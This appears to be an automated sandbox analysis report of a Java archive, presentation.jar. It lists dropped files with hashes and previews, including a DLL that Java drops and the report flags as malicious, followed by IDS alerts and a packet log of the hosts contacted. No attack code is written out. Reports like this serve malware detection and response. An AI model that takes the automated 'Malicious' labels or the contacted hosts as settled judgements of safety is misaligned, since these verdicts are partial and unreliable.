Preview:	var debugF = 0 <= location.search.indexOf("debug");..function debug(e) {. debugF && console.log(e).}..function openPopup(e, n, i, o, t, a, d, r, s, w, f) {. popup = window.open(e, n, "width=" + i + ",height=" + o + ",resizable=" + t + ",scrollbars=" + a + ",menubar=" + d + ",toolbar=" + r + ",location=" + s + ",directories=" + w + ",status=" + f), popup.focus().}..function getParameterByName(e) {. var n = window.location.search;. e = e.replace(/[\[\]]/g, "\\$&");. var i = new RegExp("[?&]" + e + "(=([^&#]*)\|&\|#\|$)").exec(n);. return i ? i[2] ? decodeURIComponent(i[2].replace(/\+/g, " ")) : "" : null.}..function processRules(e, n) {. var i = ["equals", "contains", "greaterthan", "lessthan"],. o = ["contains", "equals"];. debug("Got envData"), debug(n), debug("Got Rules"), debug(e);. for (var t = 0; t < e.rules.length; t++) {. var a = e.rules[t];. debug("Checking Rule"), debug(a);. var d = !1;. if ("true" === a.default) return a;. for (var r = !0, s = 0; s < a.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\v1[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	71813
Entropy (8bit):	5.312055266421633
Encrypted:	false
SSDEEP:	1536:tmTkVZQm0BKGEJcnJGqo01KvJ/xKIqarUKYkI8obCJwl8KBwrAcE4/I36sn:gi10BKGiL0svJ/xKLarrYkI8HJwywvn
MD5:	74A54934262638C24F2C3C7FC0078746
SHA1:	A60AD452C59E734B476B7CA03D95B2D68BE92314
SHA-256:	8952CCC09C989C9864DC4D80FC2FF261A1AEC5CE7E02AD9BFE4D0C71B51928A0
SHA-512:	C2D17807CF0F0098AFC21B05BC4E391239C976BD450130D36E14B90C35EAFF8C40D92429F65F37130ABA78C6942F97456CD623DE2571D59F7A020C47BBB8AD7E
Malicious:	false
IE Cache URL:	https://consent.trustarc.com/asset/notice.js/v/v1.7-123
Preview:	function _truste_eu(){function u(){var h=truste.eu.bindMap;h.feat.isConsentRetrieved=h.feat.crossDomain?h.feat.isConsentRetrieved:!0;if(!u.done&&h.feat.isConsentRetrieved){u.done=!0;truste.eu.ccpa.initialize();truste.eu.dnt();var l=function(){var a=truste.eu.bindMap;if(a.feat.consentResolution){var b=truste.util.readCookie(truste.eu.COOKIE_GDPR_PREF_NAME,!0);if(b&&(b=b.split(":"),!RegExp(a.behavior+"."+a.behaviorManager).test(b[2])&&(/(,us\|none)/i.test(b[2])\|\|"eu"==a.behaviorManager&&/implied.eu/i.test(b[2]))))return!0}return!1};.truste.util.fireCustomEvent(h.prefCookie);var a=function(){var a=(new Date).getTime(),b=truste.util.readCookie(truste.eu.COOKIE_REPOP,!0),c=truste.eu.bindMap.popTime;return c&&c!=b&&a>=c}();a&&(h.feat.dropPopCookie=!0);h.feat.isDNTOptoutEvent?h.feat.dntShowUI&&"expressed"==h.behavior&&(truste.eu.clickListener(truste.eu.noticeLP.pn,!0),truste.eu.msg.log("consent",h,h.messageBaseUrl)):null!=truste.util.getIntValue(h.prefCookie)?("expressed"==h.behavior&&(a\|\|l())

C:\Users\user\AppData\Local\Temp\~DF23476C21BA7AE237.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29745
Entropy (8bit):	0.2920107282763179
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAC9laAC9lrz:kBqoxxJhHWSVSEabeQ2y
MD5:	CE909A43525B3843C907DCBE55E9D7DD
SHA1:	8B6E53CCBAAB132FF8100ECB696282F011402047
SHA-256:	540A8B39EAF1EF9CF341697FC4CDABBEBDED17B16321398C539639FD17EE1602
SHA-512:	027F1DF5288441E3BFF63ABABD90521E2A72DC20FFAC545E0F180483761229D13254375ADA525D3C5155C1BAC6602117B24617A160C4B9D21C30721B9DF17446
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC3C698C18811D67C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13077
Entropy (8bit):	0.494672352663721
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loTF9loTl9lWTB+i+i7MESvOvO7vY:kBqoIysA1i7/S227g
MD5:	4B3898B6C92E740B2CF1225ED2D774DA
SHA1:	4167FE61F5A4CEA5ACEC838F6932DD58EE227BF2
SHA-256:	E7C8C857CCD387F59FEED802CDE47B14E9EDBF72DF676787302E41D29C3FF0C9
SHA-512:	D38B1363EBEE6FD13A34C93D14AC64646CDB88DD3923660DFDDD19871E87C9831EAEF1B79C78FFC7F2698C1713B127FD60EB8149510B41CD2EE52DB4A694EE17
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF893335E5A47C1F6.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	131560
Entropy (8bit):	2.9544905664245737
Encrypted:	false
SSDEEP:	384:kBqoxKEppiRPd/qxtXggxmU9AHWFzDpFmAPpR1EXYR1V6XwR1uLSZfPnzZTZ1Zq5:0mU9A2Fz9nnLqWKwjslcya3
MD5:	4B73D75643087EA13B758B035061A2C2
SHA1:	E8AF16EA1CFCB3B503A182A9A27A69B2A9FC3128
SHA-256:	CFFAB4C1957A3E5018D0D72A2F770B7DAF75FED587FDC9D489F96BFFEB0DD69D
SHA-512:	B54EB64E52FFBCCA0D542A28E86695AC3520B392653185B070610353BEC782A21A7F4FF37C7D23D50B827B21A50EAA677425889E1CEFF593465F2E28B2BD9E79
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\broker.dll Download File
Process:	C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	499712
Entropy (8bit):	6.2016592723723285
Encrypted:	false
SSDEEP:	6144:ZtuOlnq3kHzR1XyrOA5/NeQCJkGg5Q8eb2n1J3M5ScnH7dzVxWmuk:3ln/yrPXeXJk55mSn1FM5Syqmu
MD5:	AABA239E1C2208A6F00BB10034CBA621
SHA1:	2520815CDA4B4CDF652DE337D4C9285E74D2A585
SHA-256:	59767B2AC03EB8320A661F410D53A025C8975B12DE796E80B1C84306200F6A75
SHA-512:	1C80F3FF51F5D9B53232A1D9FB10C02BF22D8FBD686B76B8C6718B11BF6E834CA5B02C19535F70CBC08ADE26360D0B42C5B944D63516853FB84ACC573614AD16
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H....................................................Z..........q...................................Rich............................PE..L....ct`...........!.....0...........=.......@......................................................................p...\.......d..............................., ...B..............................`...@............@...............................text....!.......0.................. ..`.rdata.......@.......@..............@..@.data...0.... ...@... ..............@....rsrc................`..............@..@.reloc...-.......0...p..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\83aa4cc77f591dfc2374580bbd95f6ba_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
File Type:	data
Category:	dropped
Size (bytes):	45
Entropy (8bit):	0.9111711733157262
Encrypted:	false
SSDEEP:	3:/lwlt7n:WNn
MD5:	C8366AE350E7019AEFC9D1E6E6A498C6
SHA1:	5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
SHA-256:	11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
SHA-512:	33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
Malicious:	false
Preview:	........................................J2SE.

Static File Info

General
File type:	Java archive data (JAR)
Entropy (8bit):	7.8997767742025085
TrID:	Java Archive (13504/1) 62.80% ZIP compressed archive (8000/1) 37.20%
File name:	presentation.jar
File size:	6813
MD5:	6c5e7908c3a06aafd6dcebc8a2dcb674
SHA1:	d094aef9d24e13ab70f2ef767242be554ed855ae
SHA256:	cb8b20c28a0ac697b6f5bd430bd86762f6b9ef635428fe3fe77e174b172ac6f4
SHA512:	ea44242147e5c9589c56741059f7a7d6f64062ded254d697c06f754fa688bed0c9b5b79e9feac75d5569f560043ab01d88e427c4318a39c03768527686d53acb
SSDEEP:	192:kF+PVnWW4811rRBBTaikn27xcCQgcN0w7tLIdtZU1elD:kF+PV8811TBTaj27KCy0wmseD
File Content Preview:	PK........]..R................Secure_Viewer.class.....Vi[.W.~..'.#KTT.E.jP U...]p......hq..8.2.dB.Z..{]Z......>.............N.$.m?.=....s.Yn........._\|..............._....?.8%....d\.qQ.%..e\|,...Wd\|.3....B.U._.A.>...<!.C@..'.t.....)..V..1..+X.f.-..)(.n.%

File Icon


Icon Hash:	d28c8e8ea2868ad6

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
05/04/21-12:34:57.420631	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:34:57.455578	ICMP	449	ICMP Time-To-Live Exceeded in Transit	84.17.52.126	192.168.2.6
05/04/21-12:34:57.456197	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:34:57.491444	ICMP	449	ICMP Time-To-Live Exceeded in Transit	5.56.20.161	192.168.2.6
05/04/21-12:34:57.491855	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:34:57.531721	ICMP	449	ICMP Time-To-Live Exceeded in Transit	91.206.52.152	192.168.2.6
05/04/21-12:34:57.532287	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:01.387430	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:05.393181	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:09.394019	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:13.389487	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:17.419872	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:21.387668	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:25.385907	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:29.385711	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:33.383588	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:37.399720	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:41.394208	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:45.395836	ICMP	384	ICMP PING	192.168.2.6	13.107.4.50
05/04/21-12:35:45.431604	ICMP	408	ICMP Echo Reply	13.107.4.50	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 12:35:11.138201952 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.139344931 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.179843903 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.180502892 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.180775881 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.180882931 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.186825037 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.187452078 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.228049994 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.228557110 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.228579044 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.228595018 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.228610992 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.228698969 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.228780985 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.229239941 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.229259968 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.229275942 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.229337931 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.229429007 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.231369972 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.231390953 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.231533051 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.233447075 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.233488083 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.233576059 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.233630896 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.252856016 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.253563881 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.253781080 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.253941059 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.257304907 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.258536100 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.294296026 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.294322968 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.294416904 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.294872046 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.294898033 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.294929028 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.294966936 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.297121048 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.297153950 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.298403025 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.298712015 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.298744917 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.298765898 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.298854113 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.299139023 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.299210072 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.299834967 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.299952030 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.301347971 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.304305077 CEST	49731	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.341592073 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.341633081 CEST	443	49731	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.350250959 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.350282907 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.350385904 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.350436926 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.350955009 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.350980997 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.351001978 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.351030111 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.351061106 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.351090908 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.355957985 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.356194973 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.380516052 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.412817955 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.421715975 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.426954985 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.451646090 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.451703072 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.452043056 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.456312895 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.456343889 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.456676006 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.456686974 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.456938982 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.456968069 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.457082987 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.458116055 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.458147049 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.458203077 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.458247900 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.459276915 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.459311962 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.459397078 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.460503101 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.460532904 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.460597038 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.460638046 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.461679935 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.461715937 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.461798906 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.462798119 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.462835073 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.462995052 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.464005947 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.464037895 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.464099884 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.464143038 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.465204000 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.465236902 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.465405941 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.465423107 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.470302105 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.470333099 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.470405102 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.470426083 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.604990005 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.672256947 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.672533989 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.680154085 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.680244923 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:11.680263996 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.680289984 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:11.712207079 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:11.713469982 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.713563919 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.713629961 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.713665009 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.714524031 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.714617968 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.755635977 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.755672932 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.756206036 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.756238937 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.756267071 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.756406069 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.756444931 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.758336067 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.758363962 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.758466005 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.758943081 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.758975029 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.758999109 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.759049892 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.759064913 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.761471987 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.761507034 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.761620045 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.765690088 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.766227007 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.766436100 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.769174099 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.769610882 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.806868076 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.807295084 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.807425976 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.808285952 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.808340073 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.808484077 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.810286045 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.810448885 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.810467005 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.810556889 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.810590982 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.810647011 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.811664104 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.811681986 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.811762094 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.812479019 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.817177057 CEST	49733	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.819628954 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.846530914 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.853630066 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.858191967 CEST	443	49733	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.860666990 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.887094975 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.887126923 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.887243032 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.887542963 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.887612104 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.888691902 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.890057087 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.890085936 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.890155077 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.890594959 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:11.890753031 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:11.897192955 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:11.897339106 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:11.925745964 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:11.925914049 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:11.968442917 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:11.968482971 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:11.968579054 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:11.968626022 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:11.969782114 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:11.969975948 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:11.978173018 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:12.014128923 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.014153004 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.015959024 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.015990019 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.016002893 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.016016006 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.016032934 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.016052008 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.016155958 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.016345978 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.021053076 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.021081924 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.021184921 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.021212101 CEST	443	49736	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.021231890 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.021244049 CEST	443	49737	143.204.98.126	192.168.2.6
May 4, 2021 12:35:12.021285057 CEST	49736	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.021332979 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.021358967 CEST	49737	443	192.168.2.6	143.204.98.126
May 4, 2021 12:35:12.021544933 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:12.021596909 CEST	443	49732	143.204.98.25	192.168.2.6
